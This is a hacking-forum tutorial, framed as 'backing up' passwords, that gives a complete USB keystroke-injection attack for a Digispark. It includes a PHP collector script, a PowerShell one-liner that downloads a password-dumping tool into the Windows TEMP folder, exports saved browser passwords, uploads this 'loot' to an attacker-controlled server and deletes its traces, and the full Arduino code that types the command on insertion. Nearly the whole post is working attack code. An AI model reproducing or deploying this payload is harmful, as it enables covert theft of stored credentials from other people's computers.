Backing up browser passwords with Digispark 04-08-2018, 09:57 PM
#1
[Pointless chapter]
Since a lot of people liked my "1$ USB Rubber Ducky alternative" tutorial, I would like to make more "Payload threads" so that the people who missed the original thread could see this and get interested in developing keystroke injection scripts.![[Image: aNxtAPO.png]](https://i.imgur.com/aNxtAPO.png)
Okay okay, I'll do another one.
[Introduction]
So imagine you own a lot of computers and you have different passwords saved on them, one day you decided to move all of your passwords to one place. To do this you would need to go to every computer, download a program, export the passwords and upload them to a flash drive or something.Well today pikami has a solution for you!
Let's make a script that does all those things auto-magically!
For the purpose of this tutorial I will not go trough setting up the Digispark dev environment, for that take a look at https://sinister.ly/Thread-Tutorial-1-US...lternative
[What exactly are we going to do?]
- Setup our web server to save incoming passwords
- Write a script that:
1. Downloads a password recovery tool
2. Uses the tool to export browser passwords
3. Uploads exported passwords back to our server
[What you'll need]
- Digispark
- Arduino software
- Web server
[The process]
- {Setting up the webserver}
I'll assume you already have appache/nginx with php running on your server.
* First you have to upload the password recovery tool to your server, for this tutorial we'll be using WebBrowserPassView by NirSoft (link will be in the bottom of the post)
I downloaded it, named it pw.exe and placed it in the root directory of the server
* Let's create a directory for our password exports
* Now let's make a php upload script that saves all the data it gets to a file:Code:mkdir log
I copied this script from a Hak5 tutorial (link will be in the bottom ot the post)Code:<?php
$file = "log/" . $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input"));
?>
* The server is now set up
- {Writing the script for Digispark}
Okay so the first thing we need to do is write a powershell script that does what we need
* So at first the script should go somewhere that it wouldn't bother the user: windows TEMP directory is a great place
* Then it should create it's own directory so that it would be easy to clean up after ourselves: "pw" is a perfect nameCode:$TempDir = [System.IO.Path]::GetTempPath()
cd $TempDir
* Now the script shoud download the password recovery tool from our server and use it to export the passwords (the "| Out-Null" will force the powershell to wait till the execution is finished)Code:mkdir pw
cd pw
* Then it should upload the loot to our serverCode:Invoke-WebRequest "https://YOUR_SERVER/f/pw.exe" -OutFile "pw.exe" | Out-Null
.\pw.exe /scomma pw.txt | Out-Null
* Let's clean up after ourselves shal weCode:Invoke-RestMethod -Uri "https://YOUR_SERVER/upload.php" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null
Code:cd ..
Remove-Item pwd -recurse
Now that we have our script let's program the Digispark to execute it
Code:#include "DigiKeyboard.h"
void setup() {
// don't need to set anything up to use DigiKeyboard
}
void loop() {
// this is generally not necessary but with some older systems it seems to
// prevent missing the first character after a delay:
DigiKeyboard.sendKeyStroke(0);
// Open powershell
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
// Execute code from the interwebs
DigiKeyboard.print("$TempDir = [System.IO.Path]::GetTempPath();cd $TempDir;mkdir pw;cd pw;Invoke-WebRequest \"https://YOUR_SERVER/pw.exe\" -OutFile \"pw.exe\" | Out-Null;.\\pw.exe /scomma pw.txt | Out-Null;Invoke-RestMethod -Uri \"https://YOUR_SERVER/upload.php\" -Method Post -InFile pw.txt -UseDefaultCredentials | Out-Null;cd ..;Remove-Item pw -recurse");
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
while(true){
//do nothing
}
}
- {You have done it}
Congratulations! You can now backup the passwords from all those computers you own!
If everything is done correctly your exported passwords should be located on your servers, let's look at what I got:
![[Image: rEqcpo6.png]](https://i.imgur.com/rEqcpo6.png)
Sorry if you wanted to see more, I don't save passwords in browsers
Here's a video demo:
[Final notes]
So @KuhakuWolf I hope your happy.On the real note, I hope you all learned something from this and start developing your own payloads.
I would love to see your creations and as always, if you have any questions just ask, I'll be happy to help.
[External links]
https://www.nirsoft.net/password_recovery_tools.htmlhttps://www.hak5.org/blog/15-second-pass...obot-style
![[Image: 9H83e18.png]](https://i.imgur.com/9H83e18.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: AD83g1A.png]](http://i.imgur.com/AD83g1A.png)
![[Image: ezgif_com_gif_maker.gif]](http://image.ibb.co/jc44HH/ezgif_com_gif_maker.gif)
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)
